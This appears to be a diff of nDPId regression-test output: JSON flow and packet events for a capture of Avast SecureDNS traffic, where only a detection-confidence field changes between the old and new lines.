-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483010449,"flow_last_seen":1625483010570,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51929,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625482998213,"flow_last_seen":1625482998333,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64432,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073457,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":52417,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625483073336,"flow_last_seen":1625483073457,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625511645546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":65063,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":67,"packets-processed":66,"total-skipped-flows":0,"total-l4-payload-len":7095,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":33,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":33,"total-idle-flows":31,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":176,"global_ts_msec":1625556065479} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1625556065479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556065479,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAQAAH8Rgy7AqAJktdYjldqMAbsAL9sh3zMBAAABAAAAAAAAATIJU2VDVXJlRG5zBUF2QVNUA0NPbQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556065479,"flow_last_seen":1625556065479,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556065479,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":55948,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1625556067432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556067432,"pkt":"eJS0JASgYDjgxTWgCABFAABDHAgAAH8RgyrAqAJktdYjlci3AbsAL6ehZCkBAAABAAAAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556067432,"flow_last_seen":1625556067432,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556067432,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":51383,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1625556067553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556067553,"pkt":"YDjgxTWgeJS0JASgCABFAADMazAAADIRgHm11iOVwKgCZAG7yLcAuCAQZCmBgAABAAEAAAAAATIJc0VDVXJlRE5zBWF2YVNUA2NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511643408,"flow_last_seen":1625511643529,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59474,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625511645426,"flow_last_seen":1625511645546,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625556067553,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":53839,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1625556100118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556100118,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwQAAH8RhC7AqAJktdYjlfy8AbsAL4gY7+wBAAABAAAAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556100118,"flow_last_seen":1625556100118,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556100118,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1625556100236,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556100236,"pkt":"YDjgxTWgeJS0JASgCABFAADMlbkAADIRVfC11iOVwKgCZAG7\/LwAuACH7+yBgAABAAEAAAAAATIJU2VjdXJlRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1625556102196,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625556102196,"pkt":"eJS0JASgYDjgxTWgCABFAABDGwgAAH8RhCrAqAJktdYjldUVAbsAL6kdFo8BAAABAAAAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625556102196,"flow_last_seen":1625556102196,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625556102196,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54549,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1625556102314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625556102314,"pkt":"YDjgxTWgeJS0JASgCABFAADMmGEAADMRUki11iOVwKgCZAG71RUAuCGMFo+BgAABAAEAAAAAATIJU0VjVXJlRG5TBUFWYXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00568{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":7779,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":37,"total-detection-updates":0,"total-updates":0,"current-active-flows":4,"total-active-flows":37,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":194,"global_ts_msec":1625558730271} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1625558730271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625558730271,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFIAAH8RcuDAqAJktdYjldXoAbsALw4O0KsBAAABAAAAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAAB"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558730271,"flow_last_seen":1625558730271,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558730271,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":54760,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1625558730389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625558730389,"pkt":"YDjgxTWgeJS0JASgCABFAADM7EMAADIR\/2W11iOVwKgCZAG71egAuIZ80KuBgAABAAEAAAAAATIJU0VDdXJlZE5zBUFWYVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1625558735043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625558735043,"pkt":"eJS0JASgYDjgxTWgCABFAABDLFYAAH8RctzAqAJktdYjlcAAAbsAL9\/2VKsBAAABAAAAAAAAATIJc0VjVVJFZE5TBUFWQVN0A2NvTQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625558735043,"flow_last_seen":1625558735043,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625558735043,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":49152,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
